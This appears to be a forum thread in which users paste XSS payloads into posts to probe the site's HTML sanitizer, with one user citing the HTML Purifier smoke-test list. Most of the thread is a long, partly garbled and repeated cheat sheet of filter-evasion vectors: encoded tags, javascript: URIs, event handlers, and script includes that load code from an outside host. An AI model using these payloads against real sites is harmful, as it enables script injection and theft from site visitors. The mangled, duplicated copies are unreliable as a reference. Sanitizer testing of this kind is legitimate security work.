JellyPotato (Warning, Should probably stay out.)



  • redacted - bz



  • @Matches


    redacted -bz

    Jelly



  • Now for some paging



  • Now for some paging



  • Now for some paging



  • redacted - bz



  • redacted - bz



  • redacted - bz




  • F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    F
    [omitted]



  • Dance for me <script>alert('Maybe')</script><scri%20pt>alert('idk')</script%>>




  • XSS

    <
    %3C
    &lt
    <
    &LT
    <
    &#60
    &#060
    &#0060
    &#00060
    &#000060
    &#0000060
    <
    <
    <
    <
    <
    <
    &#x3c
    &#x03c
    &#x003c
    &#x0003c
    &#x00003c
    &#x000003c
    <
    <
    <
    <
    <
    &#x000003c;
    &#X3c
    &#X03c
    &#X003c
    &#X0003c
    &#X00003c
    &#X000003c
    <
    <
    <
    <
    <
    &#X000003c;
    &#x3C
    &#x03C
    &#x003C
    &#x0003C
    &#x00003C
    &#x000003C
    <
    <
    <
    <
    <
    &#x000003C;
    &#X3C
    &#X03C
    &#X003C
    &#X0003C
    &#X00003C
    &#X000003C
    <
    <
    <
    <
    <
    &#X000003C;
    \x3c
    \x3C
    \u003c
    \u003C



  • <form action="" method="GET"> <input id="query" name="query" value="Enter query here..." onfocus="this.value=''"> <input id="button" type="submit" value="Search"> </form>


  • <img src=x onerror="

    Hum @Matches"/>

    <img src=x onerror="

    .jpg' />

    <script>alert('testing')</script>

    <body> Hello {{ USERNAME }}, view your Account. <script> var id = {{ USER_ID }}; alert("Your user ID is: " + id); </script> </body>


  • ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}



  • =&{()}

    <BGSOUND »
    SRC="javascript:alert('XSS') »
    ;">

    <BASE » HREF="javascript:alert('XSS' » );//">


  • Locator
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--></S »
    CRIPT>">'><SCRIPT>alert(Stri »
    ng.fromCharCode(88,83,83))</ »
    SCRIPT>=&{}
    ';alert(String.fromCharCode( »
    88,83,83))//';alert(String. »
    fromCharCode(88,83,83))//";a »
    lert(String.fromCharCode(88, »
    83,83))//";alert(String.fro »
    mCharCode(88,83,83))//--> »
    ">'>=&{}
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-->">'>=&{}
    XSS Quick Test
    '';!--"<xss>=&{()}<br/> '';!--"=&{()}<br/> '';!--"=&{()}<br/> SCRIPT w/Alert()</xss>

    <script>alert('XSS')</SCRIPT » > SCRIPT w/Source File <SCRIPT » SRC=http://ha.ckers.org/xss. » js></SCRIPT> <p dir="auto">SCRIPT w/Char Code</p> <SCRIPT>alert(String.fromCha » rCode(88,83,83))</SCRIPT> <p dir="auto">BASE</p> <BASE » HREF="javascript:alert('XSS' » );//"> BGSOUND <BGSOUND » SRC="javascript:alert('XSS') » ;"> BODY background-image <BODY » BACKGROUND="javascript:alert » ('XSS');"> BODY ONLOAD <BODY ONLOAD=alert('XSS')> DIV background-image 1 <DIV » STYLE="background-image: » url(javascript:alert('XSS')) » "> <div></div> DIV background-image 2 <DIV » STYLE="background-image: » url(javascript:alert('XS » S'))"> <div></div> DIV expression <DIV STYLE="width: » expression(alert('XSS'));"> <div></div> FRAME <FRAMESET><FRAME » SRC="javascript:alert('XSS') » ;"></FRAMESET> IFRAME <IFRAME » SRC="javascript:alert('XSS') » ;"></IFRAME> INPUT Image <INPUT TYPE="IMAGE" » SRC="javascript:alert('XSS') » ;"> IMG w/JavaScript Directive <IMG » SRC="javascript:alert('XSS') » ;"> IMG No Quotes/Semicolon <IMG » SRC=javascript:alert('XSS')> IMG Dynsrc <IMG » DYNSRC="javascript:alert('XS » S');"> IMG Lowsrc <IMG » LOWSRC="javascript:alert('XS » S');"> IMG Embedded commands 1 <IMG » SRC="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode"> <img » src="http://www.thesiteyouar » eon.com/somecommand.php?some » variables=maliciouscode" » alt="somecommand.php?somevar » iables=maliciousc" /> somecommand.php?somevariables=maliciousc IMG STYLE w/expression exp/*<XSS » STYLE='no\xss:noxss("*//*"); » <p dir="auto">xss:ex/<em>XSS</em>//<em>/</em> »<br /> /pression(alert(&quot;XSS&quot;))'&gt;<br /> exp/*<br /> exp/*<br /> List-style-image</p> <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE><UL><LI>XSS <ul><li>XSS</li></ul> XSS IMG w/VBscript <IMG » SRC='vbscript:msgbox("XSS")' » > LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript <IMG » SRC="livescript:[code]"> US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha <IMG SRC="mocha:[code]"> OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment <IMG » STYLE="xss:expr/*XSS*/ession » (alert('XSS'))"> STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE><A » CLASS=XSS></A> <a class="XSS"></a> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE <TABLE » BACKGROUND="javascript:alert » ('XSS')"></TABLE> TD <TABLE><TD » BACKGROUND="javascript:alert » ('XSS')"></TD></TABLE> XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]> <p dir="auto"></C></X> »<br /> </xml><SPAN DATASRC=#I »<br /> DATAFLD=C DATAFORMATAS=HTML><br /> <IMG »<br /> SRC="javascript:alert('XSS') »<br /> ;"></p> <p dir="auto"><span></span><br /> <IMG SRC="javascript:alert('XSS');"><br /> XML data island w/comment <br /> <XML ID="xss"><I><B><IMG »<br /> SRC="javas<!--​ » -->cript:alert('XSS')"></B>< »<br /> /I></XML></p> <p dir="auto"><SPAN »<br /> DATASRC="#xss" DATAFLD="B" »<br /> DATAFORMATAS="HTML"></SPAN><br /> <i><b><img src="javas" »<br /> alt="javas<!-- »<br /> -->cript:alert('XSS')" »<br /> /></b></i><span></span><br /> javas<!--​ -->cript:alert('XSS')<br /> XML (locally hosted) <br /> <XML »<br /> SRC="<a href="http://ha.ckers.org/xss" rel="nofollow">http://ha.ckers.org/xss</a> »<br /> test.xml" ID=I></XML><br /> <SPAN »<br /> DATASRC=#I DATAFLD=C »<br /> DATAFORMATAS=HTML></SPAN><br /> <span></span><br /> XML HTML+TIME</p> <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block <!--​[if gte IE » 4]> <SCRIPT>alert('XSS');</S » CRIPT> <![endif]--> Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI <!--​#exec cmd="/bin/echo » '<SCRIPT SRC'"--><!--​#exec » cmd="/bin/echo » '=http://ha.ckers.org/xss.js » ></script>'"--> PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>

    <? echo('alert("XSS")'); »
    ?>

    <? echo('alert("XSS")'); ?>

    JavaScript Includes



    Character Encoding Example
    <
    %3C
    &lt
    <
    &LT
    <
    &#60 »

    &#060
    &#0060

    &#00060
    &#000 »
    060
    &#0000060
    <
    <
    & »
    #0060;
    <
    <
    &# »
    0000060;
    &#x3c
    &#x03c
    &#x003 »
    c
    &#x0003c
    &#x00003c
    &#x0000 »
    03c
    <
    <

    < »

    <
    <
    &#x000 »
    003c;
    &#X3c
    &#X03c
    &#X003c
    & »
    #X0003c
    &#X00003c
    &#X000003c »

    <
    <
    <
    &#X »
    0003c;
    <
    &#X000003c »
    ;
    &#x3C

    &#x03C
    &#x003C
    &#x0 »
    003C
    &#x00003C
    &#x000003C
    &# »
    x3C;
    <
    <
    &#x000 »
    3C;
    <
    &#x000003C;
    & »
    #X3C
    &#X03C
    &#X003C
    &#X0003C »

    &#X00003C
    &#X000003C

    &#X3C »
    ;
    <
    <
    < »

    <
    &#X000003C;
    \x3c »

    \x3C
    \u003c
    \u003C
    <
    %3C
    &lt
    <
    &L »
    T
    &LT;
    <
    <
    <

    & »
    lt;
    <
    <
    <
    <
    < »

    <
    <
    <
    <
    <
    &l »
    t;
    <
    <
    <
    <
    <
    »

    <
    <
    <
    <
    <
    &l »
    t;
    <
    <
    <
    <
    <
    »
    <
    <
    <
    <
    <
    &lt »
    ;

    <
    <
    <
    <
    <
    »
    <
    <
    <
    <
    <
    &lt »
    ;
    <
    <
    <
    <
    <
    & »
    lt;

    <
    <
    <
    <
    &lt »
    ;
    <
    \x3c
    \x3C
    \u003c
    \u00 »
    3C
    < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
    Case Insensitive
    <IMG »
    SRC=JaVaScRiPt:alert('XSS')>
    HTML Entities
    <IMG »
    SRC=javascript:alert("X »
    SS")>
    Grave Accents
    <IMG »
    SRC=javascript:alert("RSnak » e says, 'XSS'")>
    <img »
    src="%60javascript%3Aalert(" »
    alt="javascript:alert(&quot » ;RSnake" /> javascript:alert("RSnake
    Image w/CharCode
    <IMG »
    SRC=javascript:alert(String. »
    fromCharCode(88,83,83))>
    UTF-8 Unicode Encoding
    <IMG »
    SRC=java&# »
    115;crip& »
    #116;:ale& »
    #114;t('X&# »
    83;S')>
    Long UTF-8 Unicode w/out Semicolons
    <IMG »
    SRC=&#0000106&#0000097&#0000 »
    118&#0000097&#0000115&#00000 »
    99&#0000114&#0000105&#000011 »
    2&#0000116&#0000058&#0000097 »
    &#0000108&#0000101&#0000114& »
    #0000116&#0000040&#0000039&# »
    0000088&#0000083&#0000083&#0 »
    000039&#0000041>
    DIV w/Unicode

    Hex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Encoded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Newline jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Carriage Return jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Multiline w/Carriage Returns p
    t
    :
    a
    l
    e
    r
    t
    (
    '
    X
    S
    S
    ' »

    )
    "

    <img »
    src="j%20a%20v%20a%20s%20c%2 »
    0r%20i%20p%20t%20%3A%20a%20l »
    %20e%20r%20t%20(%20'%20X%20S »
    %20S%20'%20)" alt="j a v a s »
    c r i p t : a l e r t ( ' X »
    S" />
    j a v a s c r i p t : a l e r t ( ' X S
    Null Chars 1
    <IMG »
    SRC=java\0script:alert("XSS") »

    Null Chars 2
    &<SCR\0IPT>alert("XSS")</SCR\0 »
    IPT>
    &
    &
    Spaces/Meta Chars

    Non-Alpha/Non-Digit
    <SCRIPT/XSS »
    SRC="http://ha.ckers.org/xss »
    .js"></SCRIPT>
    Non-Alpha/Non-Digit Part 2

    <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding <A » HREF="http://0x42.0x0000066. » 0x7.0x93/">XSS</A> <a href="/">XSS</a> XSS Octal Encoding <A » HREF="http://0102.0146.0007. » 00000223/">XSS</A> <a href="/">XSS</a> XSS Mixed Encoding <A » HREF="h tt\tp://6 6.00014 » 6.0x7.147/">XSS</A> <a » href="h%20tt%20p%3A//6%206.0 » 00146.0x7.147/">XSS</a> XSS Protocol Resolution Bypass <A » HREF="//www.google.com/">XSS » </A> <a>XSS</a> XSS Firefox Lookups 1 <A HREF="//google">XSS</A> <a href="//google">XSS</a> XSS Firefox Lookups 2 <A » HREF="http://ha.ckers.org@go » ogle">XSS</A> <a » href="http://google">XSS</a> XSS Firefox Lookups 3 <A » HREF="http://google:ha.ckers » .org">XSS</A> <a » href="http://google">XSS</a> XSS Removing Cnames <A » HREF="http://google.com/">XS » S</A> <a>XSS</a> XSS Extra dot for Absolute DNS <A » HREF="http://www.google.com. » /">XSS</A> <a>XSS</a> XSS JavaScript Link Location <A » HREF="javascript:document.lo » cation='http://www.google.co » m/'">XSS</A> <a>XSS</a> XSS Content Replace <A » HREF="http://www.gohttp://ww » w.google.com/ogle.com/">XSS< » /A> <a » href="http://www.gohttp//www » .google.com/ogle.com/">XSS</ » a> XSS</script>


  • Just so you know, the source code for the HTML sanitizer is here:



  • <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">

    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />

    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />



  • What's the fun in that?
    @ben_lubar Something broke in the big block from http://htmlpurifier.org/live/smoketests/xssAttacks.php - trying to figure out which combination caused it.



  • IMG Dynsrc
    <IMG »
    DYNSRC="javascript:alert('XS »
    S');">
    IMG Lowsrc
    <IMG »
    LOWSRC="javascript:alert('XS »
    S');">
    IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc





  • IMG Embedded commands 1
    <IMG »
    SRC="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode">
    <img »
    src="http://www.thesiteyouar »
    eon.com/somecommand.php?some »
    variables=maliciouscode" »
    alt="somecommand.php?somevar »
    iables=maliciousc" />
    somecommand.php?somevariables=maliciousc
    IMG STYLE w/expression
    exp/<XSS »
    STYLE='no\xss:noxss("
    //*"); »

    xss:ex/XSS/// »
    /pression(alert("XSS"))'>
    exp/*
    exp/*
    List-style-image

    <STYLE>li {list-style-image: » url("javascript:alert('XSS') » ");}</STYLE>
    • XSS
      • XSS
      XSS IMG w/VBscript LAYER <LAYER » SRC="http://ha.ckers.org/scr » iptlet.html"></LAYER> Livescript US-ASCII encoding scriptalert(XSS)/script » scriptalert(XSS)/script scriptalert(XSS)/script META <META HTTP-EQUIV="refresh" » CONTENT="0;url=javascript:al » ert('XSS');"> META w/data:URL <META HTTP-EQUIV="refresh" » CONTENT="0;url=data:text/htm » l;base64,PHNjcmlwdD5hbGVydCg » nWFNTJyk8L3NjcmlwdD4K"> META w/additional URL parameter <META HTTP-EQUIV="refresh" » CONTENT="0; » URL=http://;URL=javascript:a » lert('XSS');"> Mocha OBJECT <OBJECT » TYPE="text/x-scriptlet" » DATA="http://ha.ckers.org/sc » riptlet.html"></OBJECT> OBJECT w/Embedded XSS <OBJECT » classid=clsid:ae24fdae-03c6- » 11d1-8b76-0080c744f389><para » m name=url » value=javascript:alert('XSS' » )></OBJECT> Embed Flash <EMBED » SRC="http://ha.ckers.org/xss » .swf" » AllowScriptAccess="always">< » /EMBED> STYLE <STYLE » TYPE="text/javascript">alert » ('XSS');</STYLE> STYLE w/Comment STYLE w/Anonymous HTML <XSS » STYLE="xss:expression(alert( » 'XSS'))"> STYLE w/background-image <STYLE>.XSS{background-image » :url("javascript:alert('XSS' » )");}</STYLE> STYLE w/background <STYLE » type="text/css">BODY{backgro » und:url("javascript:alert('X » SS')")}</STYLE> Stylesheet <LINK REL="stylesheet" » HREF="javascript:alert('XSS' » );"> Remote Stylesheet 1 <LINK REL="stylesheet" » HREF="http://ha.ckers.org/xs » s.css"> Remote Stylesheet 2 <STYLE>@import'http://ha.cke » rs.org/xss.css';</STYLE> Remote Stylesheet 3 <META HTTP-EQUIV="Link" » Content="<http://ha.ckers.or » g/xss.css>; REL=stylesheet"> Remote Stylesheet 4 <STYLE>BODY{-moz-binding:url » ("http://ha.ckers.org/xssmoz » .xml#xss")}</STYLE> TABLE
      TD
      XML namespace <HTML xmlns:xss> <?import » namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> <xss:xss>X » SS</xss:xss> </HTML> <?import namespace="xss" » implementation="http://ha.ck » ers.org/xss.htc"> XSS <?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"> XSS XML data island w/CDATA <XML » ID=I><X><C><![CDATA[<IMG » SRC="javas]]><![CDATA[cript: » alert('XSS');">]]>

      </C></X> »
      </xml><SPAN DATASRC=#I »
      DATAFLD=C DATAFORMATAS=HTML>
      <IMG »
      SRC="javascript:alert('XSS') »
      ;">



      XML data island w/comment
      <XML ID="xss"><IMG »
      SRC="javascript:alert('XSS')">
      < »
      /I></XML>

      <SPAN »
      DATASRC="#xss" DATAFLD="B" »
      DATAFORMATAS="HTML">
      <img src="javas" »
      alt="javas<!-- »
      -->cript:alert('XSS')" »
      />

      javascript:alert('XSS')
      XML (locally hosted)
      <XML »
      SRC="http://ha.ckers.org/xss »
      test.xml" ID=I></XML>
      <SPAN »
      DATASRC=#I DATAFLD=C »
      DATAFORMATAS=HTML>

      XML HTML+TIME

      <HTML><BODY> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <t:set » attributeName="innerHTML" » to="XSS<SCRIPT » DEFER>alert('XSS')</SCRIPT>" » > </BODY></HTML> <?xml:namespace » prefix="t" » ns="urn:schemas-microsoft-co » m:time"> <?import » namespace="t" » implementation="#default#tim » e2"> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> Commented-out Block Cookie Manipulation <META » HTTP-EQUIV="Set-Cookie" » Content="USERID=<SCRIPT>aler » t('XSS')</SCRIPT>"> Local .htc file <XSS STYLE="behavior: » url(http://ha.ckers.org/xss. » htc);"> Rename .js to .jpg <SCRIPT » SRC="http://ha.ckers.org/xss » .jpg"></SCRIPT> SSI PHP <? » echo('<SCR)'; echo('IPT>aler » t("XSS")</SCRIPT>'); ?>

      <? echo('alert("XSS")'); »
      ?>

      <? echo('alert("XSS")'); ?>

      JavaScript Includes



      Character Encoding Example
      <
      %3C
      &lt
      <
      &LT
      <
      &#60 »

      &#060
      &#0060

      &#00060
      &#000 »
      060
      &#0000060
      <
      <
      & »
      #0060;
      <
      <
      &# »
      0000060;
      &#x3c
      &#x03c
      &#x003 »
      c
      &#x0003c
      &#x00003c
      &#x0000 »
      03c
      <
      <

      < »

      <
      <
      &#x000 »
      003c;
      &#X3c
      &#X03c
      &#X003c
      & »
      #X0003c
      &#X00003c
      &#X000003c »

      <
      <
      <
      &#X »
      0003c;
      <
      &#X000003c »
      ;
      &#x3C

      &#x03C
      &#x003C
      &#x0 »
      003C
      &#x00003C
      &#x000003C
      &# »
      x3C;
      <
      <
      &#x000 »
      3C;
      <
      &#x000003C;
      & »
      #X3C
      &#X03C
      &#X003C
      &#X0003C »

      &#X00003C
      &#X000003C

      &#X3C »
      ;
      <
      <
      < »

      <
      &#X000003C;
      \x3c »

      \x3C
      \u003c
      \u003C
      <
      %3C
      &lt
      <
      &L »
      T
      &LT;
      <
      <
      <

      & »
      lt;
      <
      <
      <
      <
      < »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »

      <
      <
      <
      <
      <
      &l »
      t;
      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;

      <
      <
      <
      <
      <
      »
      <
      <
      <
      <
      <
      &lt »
      ;
      <
      <
      <
      <
      <
      & »
      lt;

      <
      <
      <
      <
      &lt »
      ;
      <
      \x3c
      \x3C
      \u003c
      \u00 »
      3C
      < %3C &lt < &LT < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < < \x3c \x3C \u003c \u003C
      Case Insensitive
      <IMG »
      SRC=JaVaScRiPt:alert('XSS')>
      HTML Entities
      <IMG »
      SRC=javascript:alert("X »
      SS")>
      Grave Accents
      <IMG »
      SRC=javascript:alert("RSnak » e says, 'XSS'")>
      <img »
      src="%60javascript%3Aalert(" »
      alt="javascript:alert(&quot » ;RSnake" /> javascript:alert("RSnake
      Image w/CharCode
      <IMG »
      SRC=javascript:alert(String. »
      fromCharCode(88,83,83))>
      UTF-8 Unicode Encoding
      <IMG »
      SRC=java&# »
      115;crip& »
      #116;:ale& »
      #114;t('X&# »
      83;S')>
      Long UTF-8 Unicode w/out Semicolons
      <IMG »
      SRC=&#0000106&#0000097&#0000 »
      118&#0000097&#0000115&#00000 »
      99&#0000114&#0000105&#000011 »
      2&#0000116&#0000058&#0000097 »
      &#0000108&#0000101&#0000114& »
      #0000116&#0000040&#0000039&# »
      0000088&#0000083&#0000083&#0 »
      000039&#0000041>
      DIV w/Unicode

      Hex Encoding w/out Semicolons UTF-7 Encoding <HEAD><META » HTTP-EQUIV="CONTENT-TYPE" » CONTENT="text/html; » charset=UTF-7"> » </HEAD>+ADw-SCRIPT+AD4-alert » ('XSS');+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS') » ;+ADw-/SCRIPT+AD4- +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- Escaping JavaScript escapes \";alert('XSS');// \";alert('XSS');// \";alert('XSS');// End title tag </TITLE><SCRIPT>alert("XSS") » ;</SCRIPT> STYLE w/broken up JavaScript <STYLE>@im\port'\ja\vasc\rip » t:alert("XSS")';</STYLE> Embedded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Encoded Tab jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Newline jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Embedded Carriage Return jav »
ascript:alert('XSS'); jav ascript:alert('XSS'); Multiline w/Carriage Returns p
      t
      :
      a
      l
      e
      r
      t
      (
      '
      X
      S
      S
      ' »

      )
      "

      <img »
      src="j%20a%20v%20a%20s%20c%2 »
      0r%20i%20p%20t%20%3A%20a%20l »
      %20e%20r%20t%20(%20'%20X%20S »
      %20S%20'%20)" alt="j a v a s »
      c r i p t : a l e r t ( ' X »
      S" />
      j a v a s c r i p t : a l e r t ( ' X S
      Null Chars 1
      <IMG »
      SRC=java\0script:alert("XSS") »

      Null Chars 2
      &<SCR\0IPT>alert("XSS")</SCR\0 »
      IPT>
      &
      &
      Spaces/Meta Chars

      Non-Alpha/Non-Digit
      <SCRIPT/XSS »
      SRC="http://ha.ckers.org/xss »
      .js"></SCRIPT>
      Non-Alpha/Non-Digit Part 2

      <BODY » onload!#$%&()*~+-_.,:;?@[/|\ » ]^`=alert("XSS")> No Closing Script Tag <SCRIPT » SRC=http://ha.ckers.org/xss. » js Protocol resolution in script tags <SCRIPT » SRC=//ha.ckers.org/.j> Half-Open HTML/JavaScript alert("XSS");//< < < Malformed IMG Tags <script>alert("XSS")</SC » IMG Embedde RIPT>"> "> "> No Quotes/Semicolons <SCRIPT>a=/XSS/ alert(a.sour » ce)</SCRIPT> Evade Regex Filter 1 <SCRIPT a=">" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 2 <SCRIPT ="blah" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 3 <SCRIPT a="blah" '' » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 4 <SCRIPT "a='>'" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Evade Regex Filter 5 <SCRIPT a=`>` » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> Filter Evasion 1 <SCRIPT>document.write("<SCR » I");</SCRIPT>PT » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> PT » SRC="http://ha.ckers.org/xss » .js"> PT SRC="http://ha.ckers.org/xss.js"> Filter Evasion 2 <SCRIPT a=">'>" » SRC="http://ha.ckers.org/xss » .js"></SCRIPT> IP Encoding <A » HREF="http://66.102.7.147/"> » XSS</A> <a » href="http://66.102.7.147/"> » XSS</a> XSS URL Encoding <A » HREF="http://%77%77%77%2E%67 » %6F%6F%67%6C%65%2E%63%6F%6D" » >XSS</A> <a>XSS</a> XSS Dword Encoding <A » HREF="http://1113982867/">XS » S</A> <a href="/">XSS</a> XSS Hex Encoding 